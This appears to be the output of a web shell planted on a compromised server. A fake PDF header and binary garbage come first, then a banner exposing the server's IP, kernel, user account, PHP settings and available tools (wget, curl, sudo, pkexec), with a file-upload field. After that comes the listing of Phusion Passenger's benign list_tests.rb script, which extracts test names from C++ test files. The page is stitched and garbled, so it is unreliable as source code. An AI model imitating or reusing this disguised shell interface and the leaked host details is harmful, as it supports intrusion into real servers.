...........................................................................................................................................................................................................................................................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%PDF-1.5 MRK IS HERE %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 65.108.66.160 / Your IP : 216.73.217.50 Web Server : Apache System : Linux srv16.asso.com.ar 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64 User : alasaweborg ( 1047) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /etc/passenger/dev/ |
Upload File : |
#!/usr/bin/env ruby
#
# Usage: ./dev/list_tests.rb <FILENAME>
#
# Lists the test names in the given .cpp test file.
require_relative '../src/ruby_supportlib/phusion_passenger/utils/ansi_colors'
include PhusionPassenger::Utils::AnsiColors
def extract_category_name(occurrence)
occurrence =~ / (.+) /
return $1
end
def extract_test_name(occurrence)
occurrence = occurrence.sub(/.*?\((.+)\).*/m, '\1')
occurrence.gsub!(/"\n[ \t]*"/m, '')
occurrence.sub!(/\A"/, '')
occurrence.sub!(/"\Z/, '')
return occurrence
end
def start(filename)
STDOUT.write(DEFAULT_TERMINAL_COLOR)
begin
occurrences = File.read(filename).scan(%r{/\*\*\*\*\* .+? \*\*\*\*\*/|set_test_name\(.+?\);}m)
occurrences.each do |occurrence|
if occurrence =~ %r{\A/}
puts ansi_colorize("<b>" + extract_category_name(occurrence) + "</b>")
else
puts " " + extract_test_name(occurrence)
end
end
ensure
STDOUT.write(RESET)
end
end
start(ARGV[0])